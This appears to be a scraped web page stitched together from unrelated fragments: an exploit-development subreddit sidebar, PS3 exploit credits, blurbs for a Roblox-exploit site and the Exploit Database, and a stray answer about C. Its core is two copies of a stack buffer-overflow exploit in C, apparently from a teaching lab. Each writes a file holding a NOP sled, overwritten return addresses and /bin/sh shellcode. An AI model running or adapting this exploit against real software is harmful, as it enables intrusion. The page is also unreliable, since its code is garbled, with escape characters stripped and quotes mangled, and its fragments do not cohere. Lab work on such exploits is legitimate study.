- Exploit Development for Fun and Profit! Beginners welcome. Created Dec 30, 2014. R/ExploitDev Rules. Stop breaking the law. Not your personal army. Be awesome to each other. View All Moderators. Help Reddit App.
- Many thanks to xerpi for porting the memory leak exploit to ps3, zecoxao & Joonie for their early & renewed support, mysis for documenting vsh/lv2, kakaroto for the PS3 IDA tools, naherwert for scetool, Rebug Team for producing/updating the only CFW adequate to develop this work, Cobra team for sharing their CobraUSB source, the psdevwiki team.
Best website for Roblox exploits, a developers community, and more from WeAreDevs. The Exploit Database is maintained by Offensive Security, an information security training company that provides various Information Security Certifications as well as high end penetration testing services. The Exploit Database is a non-profit project that is provided as a public service by Offensive Security. Sorry cant understand your question fully but i am assuming that you wanted to ask.What is C and how to program in C. C is a Powerful Programming Language. It was made in late 1970's by Dennis Ritchie and Bell Labs for the Unix systems. It gained a lot of popularity and till today also is one of the most popular programming language.
Join GitHub today
GitHub is home to over 40 million developers working together to host and review code, manage projects, and build software together.
Sign upBranch:master
Find file Copy path
We Are Devs Exploit
1 contributor
| /* exploit.c */ |
| /* A program that creates a file containing code for launching shell */ |
| #include<stdlib.h> |
| #include<stdio.h> |
| #include<string.h> |
| char shellcode[]= |
| 'x31xc0'/* xorl %eax,%eax */ |
| 'x50'/* pushl %eax */ |
| 'x68''//sh'/* pushl $0x68732f2f */ |
| 'x68''/bin'/* pushl $0x6e69622f */ |
| 'x89xe3'/* movl %esp,%ebx */ |
| 'x50'/* pushl %eax */ |
| 'x53'/* pushl %ebx */ |
| 'x89xe1'/* movl %esp,%ecx */ |
| 'x99'/* cdql */ |
| 'xb0x0b'/* movb $0x0b,%al */ |
| 'xcdx80'/* int $0x80 */ |
| ; |
| unsignedlongget_sp(void) |
| { |
| /* This function (suggested in alephOne's paper) prints the |
| stack pointer using assembly code. */ |
| __asm__('movl %esp,%eax'); |
| } |
| voidmain(int argc, char **argv) |
| { |
| char buffer[517]; |
| FILE *badfile; |
| /* Initialize buffer with 0x90 (NOP instruction) */ |
| memset(&buffer, 0x90, 517); |
| /* You need to fill the buffer with appropriate contents here */ |
| /* Initialization of variables (cf. alephOne's tutorial) */ |
| char *ptr; |
| long *addr_ptr, addr; |
| int offset = 200, bsize = 517; |
| int i; |
| addr = get_sp() + offset; |
| ptr = buffer; |
| addr_ptr = (long*)(ptr); |
| /* First, fill with the buffer address |
| This is slightly adapted from alephOne's tutorial |
| because gcc detected it as a smashing attempt */ |
| for (i = 0; i < 10; i++) |
| *(addr_ptr++) = addr; |
| /* We now fill the rest of the buffer with our shellcode |
| which was provided above. Again, this is slightly |
| adapted from alephOne's tutorial because gcc |
| detected it as a smashing attempt */ |
| for (i = 0; i < strlen(shellcode); i++) |
| buffer[bsize - (sizeof(shellcode) + 1) + i] = shellcode[i]; |
| /* Finally, we insert a NULL code at the very end of the buffer */ |
| buffer[bsize - 1] = '0'; |
| /* Save the contents to the file 'badfile' */ |
| badfile = fopen('./badfile', 'w'); |
| fwrite(buffer, 517, 1, badfile); |
| fclose(badfile); |
| } |
Copy lines Copy permalink
This repository has been archived by the owner. It is now read-only.
PermalinkJoin GitHub today
GitHub is home to over 40 million developers working together to host and review code, manage projects, and build software together.
Sign upBranch:master
Find file Copy path
Exploit Dev How Much C To 1
andschwaUpdating code and comments8e0a802Oct 7, 2013
2 contributors
| /* exploit.c */ |
| /* A program that creates a file containing code for launching shell */ |
| #include<stdlib.h> |
| #include<stdio.h> |
| #include<string.h> |
| char shellcode[]= |
| 'x31xc0'/* xorl %eax,%eax */ |
| 'x50'/* pushl %eax */ |
| 'x68''//sh'/* pushl $0x68732f2f */ |
| 'x68''/bin'/* pushl $0x6e69622f */ |
| 'x89xe3'/* movl %esp,%ebx */ |
| 'x50'/* pushl %eax */ |
| 'x53'/* pushl %ebx */ |
| 'x89xe1'/* movl %esp,%ecx */ |
| 'x99'/* cdql */ |
| 'xb0x0b'/* movb $0x0b,%al */ |
| 'xcdx80'/* int $0x80 */ |
| ; |
| /* Function that calls an assembly instuction |
| to return the address of the top of the stack */ |
| unsignedlongget_sp(void) |
| { |
| __asm__('movl %esp,%eax'); |
| } |
| voidmain(int argc, char **argv) |
| { |
| char buffer[517]; |
| FILE *badfile; |
| /* Initialize buffer with 0x90 (NOP instruction) */ |
| memset(&buffer, 0x90, 517); |
| /* You need to fill the buffer with appropriate contents here */ |
| int i = 0; |
| /* Pointer to buffer */ |
| char *ptr; |
| /* Long int to handle a sucession of retptr addresses */ |
| long *addrptr; |
| /* Address to land us in stack.c's bof function |
| in order to overwrite the return and send us to the exploit */ |
| long retaddr; |
| /* num is a position int, used to place shell code plus null at end of buffer */ |
| int num = sizeof(buffer) - (sizeof(shellcode) + 1); |
| /* argv was used as an attempt to guess the stack pointer offset |
| at runtime. This approach was not successful, it drastically |
| changes the address of the return we want to overwrite in stack.c */ |
| /* offset = argv[1]; */ |
| /* Grab the address of the start of buffer */ |
| ptr = buffer; |
| /* Cast the address into a long int */ |
| addrptr = (long*)(ptr); |
| /* printf('buffaddr: %11xn', get_buffaddr(buffer)); */ |
| /* This address refers to an address inside of |
| stack.c's bof function. The address was determined as a |
| result of initializing x to 0 in stack.'s bif function and |
| printing its address with a printf statement */ |
| /* retaddr = 0xbffff362; */ |
| /* Alternative, correct approach that required us taking an educated |
| guess at what the offest should be in order to land in stack.c's |
| bof function. */ |
| retaddr = get_sp() + 500; |
| /* Addresses printed out for orientation, confirmation of process. |
| printf('stack ptr: 0x%xn', get_sp()); |
| printf('retaddr: 0x%xn', retptr); |
| printf('retaddr: 0x%xn', get_sp() + 502); |
| printf('buffer: 0x%xn', buffer); |
| printf('shellcode size: %dn', sizeof(shellcode)); */ |
| /* Fill the first 20 words of the buffer with retaddr */ |
| for (i = 0; i < 20; i++) |
| *(addrptr++) = retaddr; |
| /* Fill the end of buffer with our shellcode */ |
| for (i = 0; i < sizeof(shellcode); i++) |
| buffer[num + i] = shellcode[i]; |
| /* Null terminate our shellcode at end of buffer */ |
| buffer[sizeof(buffer) - 1] = '0'; |
| /* Save the contents to the file 'badfile' */ |
| badfile = fopen('./badfile', 'w'); |
| fwrite(buffer, 517, 1, badfile); |
| fclose(badfile); |
| } |
Exploit Dev How Much C To Build
Wearedevs Exploits
Copy lines Copy permalink
Comments are closed.